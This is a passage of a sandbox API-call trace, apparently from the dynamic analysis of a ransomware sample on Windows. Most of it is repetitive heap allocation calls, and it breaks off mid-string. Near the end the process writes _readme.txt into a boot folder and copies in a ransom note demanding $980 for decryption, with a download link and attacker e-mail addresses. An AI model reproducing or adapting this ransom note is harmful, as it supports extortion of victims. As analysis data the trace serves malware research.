(HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.183] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.183] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.183] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.183] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.183] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.184] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.184] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.185] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.185] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.187] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.187] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.187] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0184.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.188] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.188] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.188] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.188] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.188] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.189] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.189] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.189] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.189] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0184.189] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.189] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.190] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.190] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.190] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0184.190] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.191] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.191] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.191] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0184.191] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.191] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.191] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.191] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.192] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.192] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.192] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.192] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.192] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.193] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.193] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.193] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.193] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0184.193] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.193] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.194] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.194] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.194] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0184.194] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.195] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.195] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.195] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0184.195] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.195] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.195] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.195] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.196] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.196] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.196] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.196] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.197] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.197] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.197] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.197] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.197] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.198] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.198] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.198] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.198] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.198] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.198] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.199] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.199] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.199] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.199] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.199] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.199] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.200] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.200] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.200] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.200] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.200] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.200] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.200] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.200] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0184.201] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.201] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.201] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.201] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.201] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.201] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.202] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.202] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.202] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0184.202] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.203] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.203] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.203] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0184.203] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.203] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.203] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.204] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.204] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.204] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.204] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.204] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.205] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.205] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0184.205] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.206] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.206] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.206] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.206] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0184.206] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.206] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.206] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.206] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0184.207] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.207] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.207] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.208] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.208] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.208] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.208] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.208] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.208] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.208] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.209] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.209] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.209] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.209] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.209] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.210] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.210] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.210] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.210] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.210] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.210] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.210] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.211] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.211] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.211] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.211] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.211] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.212] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.212] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.212] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.212] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0184.212] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.212] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.212] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.213] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.213] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.213] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.213] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.213] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.213] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0184.214] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.214] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.214] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.214] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0184.214] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.215] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.215] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.215] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.215] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.215] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.215] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.215] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.216] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.216] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.216] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.216] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.216] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0184.217] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.217] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.217] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.217] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.217] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0184.218] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.218] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.218] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.218] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.218] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.218] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.219] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.219] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.219] PathFindFileNameW (pszPath="C:\\Boot\\nb-NO\\") returned="nb-NO\\" [0184.219] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.219] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0184.219] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0184.219] PathFindFileNameW (pszPath="") returned="" [0184.219] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.219] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x74ff0000 [0184.220] GetProcAddress (hModule=0x74ff0000, lpProcName="SHGetFolderPathW") returned 0x75075708 [0184.220] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x800) returned 0x2e902a8 [0184.220] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2e902a8 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0184.220] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x2e765d0 [0184.220] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.220] FreeLibrary (hLibModule=0x74ff0000) returned 1 [0184.220] PathAppendW (in: pszPath="C:\\Boot\\nb-NO\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\nb-NO\\_readme.txt") returned 1 [0184.220] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.220] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.220] PathFileExistsW (pszPath="C:\\Boot\\nb-NO\\_readme.txt") returned 0 [0184.221] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x2e93a68 [0184.221] lstrcpyW (in: lpString1=0x2e93a68, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0184.221] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 